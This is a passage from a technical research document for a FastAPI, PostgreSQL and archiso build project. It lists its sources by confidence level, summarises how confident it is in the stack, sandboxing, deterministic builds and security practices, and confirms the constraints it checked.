- Phase 3: Track package repository snapshot timestamps, invalidate when snapshot changes
Confidence: MEDIUM - Standard approach exists, but implementation details depend on Arch repository snapshot strategy
Sources
Primary (HIGH confidence)
- FastAPI Documentation - Security - Official security guide
- Caddy Documentation - Reverse Proxy - Official Caddy docs
- Caddy Documentation - Automatic HTTPS - Certificate management
- systemd-nspawn ArchWiki - Official Arch documentation
- archiso ArchWiki - Official archiso documentation
- PostgreSQL 18 Documentation - Backup and Restore - Official PostgreSQL docs
- SOURCE_DATE_EPOCH Specification - Official reproducible builds spec
- SQLAlchemy 2.0 Documentation - Connection Pooling - Official SQLAlchemy docs
- archiso deterministic builds merge request - Official archiso improvement
Secondary (MEDIUM confidence)
- Building High-Performance Async APIs with FastAPI, SQLAlchemy 2.0, and Asyncpg
- FastAPI Production Deployment Best Practices
- FastAPI CSRF Protection Guide
- A Practical Guide to FastAPI Security
- Implementing Rate Limiter with FastAPI and Redis
- Caddy 2 Config for FastAPI
- Lightweight Development Sandboxes with systemd-nspawn
- Handling PostgreSQL Connection Limits in FastAPI
- PostgreSQL Backup Best Practices - 15 Essential Strategies
- 13 PostgreSQL Backup Best Practices for Developers and DBAs
- Reproducible Arch Linux Packages
- FastAPI with Async SQLAlchemy and Alembic
Tertiary (LOW confidence)
- CHAOS RAT in AUR Packages - Malware incident report
- Sandboxing Untrusted Code in 2026 - General sandboxing approaches
- FastAPI Production Checklist - Community best practices
Metadata
Confidence breakdown:
- Standard stack: HIGH - All technologies in active use for production FastAPI + PostgreSQL deployments in 2026
- Architecture patterns: HIGH - Verified with official documentation and production examples
- Security practices: HIGH - Based on official FastAPI security docs and established OWASP patterns
- systemd-nspawn sandboxing: MEDIUM - Well-documented for general use, but specific archiso integration pattern not widely documented
- Deterministic builds: MEDIUM - archiso MR #436 implemented determinism, but practical application details require experimentation
- Pitfalls: HIGH - Based on documented incidents (CHAOS RAT malware), official docs warnings, and production failure patterns
Research date: 2026-01-25 Valid until: ~30 days (2026-02-25) - Technologies are stable, but security advisories and package versions may change
Critical constraints verified:
- ✅ Python with FastAPI, SQLAlchemy, Alembic, Pydantic
- ✅ PostgreSQL as database
- ✅ Ruff as Python linter/formatter (NOT black/flake8/isort)
- ✅ systemd-nspawn for sandboxing
- ✅ archiso for ISO builds
- ✅ <200ms p95 latency achievable with async FastAPI + asyncpg
- ✅ ISO build within 15 minutes (mkarchiso baseline: 5-10 min)
- ✅ HTTPS with Caddy automatic certificates
- ✅ Rate limiting and CSRF protection libraries available
- ✅ Deterministic builds supported via SOURCE_DATE_EPOCH